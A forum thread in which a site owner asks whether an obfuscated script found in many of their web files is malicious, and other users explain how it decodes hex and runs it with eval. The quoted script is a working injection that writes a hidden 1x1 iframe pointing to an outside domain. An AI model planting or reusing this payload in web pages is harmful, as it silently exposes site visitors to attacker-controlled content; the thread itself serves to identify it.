SitePoint Sponsor

User Tag List

Results 1 to 3 of 3
  1. #1
    SitePoint Wizard nofel's Avatar
    Join Date
    Aug 2007
    Location
    Earth
    Posts
    1,766
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

    is this code malicious?

    hi all,
    i am going through a website file on my pc and i saw many files. filled up with
    Code:
    <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f73617676692d696e766573746d656e74732e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
    can it be a code, i highly doubt it or analytics?
    All those who wander aren't lost.

  2. #2
    Avid Logophile silver trophy
    ParkinT's Avatar
    Join Date
    May 2006
    Location
    Central Florida
    Posts
    2,287
    Mentioned
    182 Post(s)
    Tagged
    4 Thread(s)
    It is obfuscated Javascript. Each pair of digits represents a Hex value. This (one line) script unwraps that long string, assembling the hex values into a single string and then executes the command that string represents.

    The best (safest) way to determine if it is benign is to replace that last "eval(t);" with "document.write(t);"

    The output will show you what is intended to be 'executed'
    Don't be yourself. Be someone a little nicer. -Mignon McLaughlin, journalist and author (1913-1983)


    Literally, the best app for readers.
    Make Your P@ssw0rd Secure
    Leveraging SubDomains

  3. #3
    Community Advisor silver trophybronze trophy
    dresden_phoenix's Avatar
    Join Date
    Jun 2008
    Location
    Madison, WI
    Posts
    2,742
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Better yet, use alert(t);

    (This code appears to document.write an iframe and URL...)btw


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •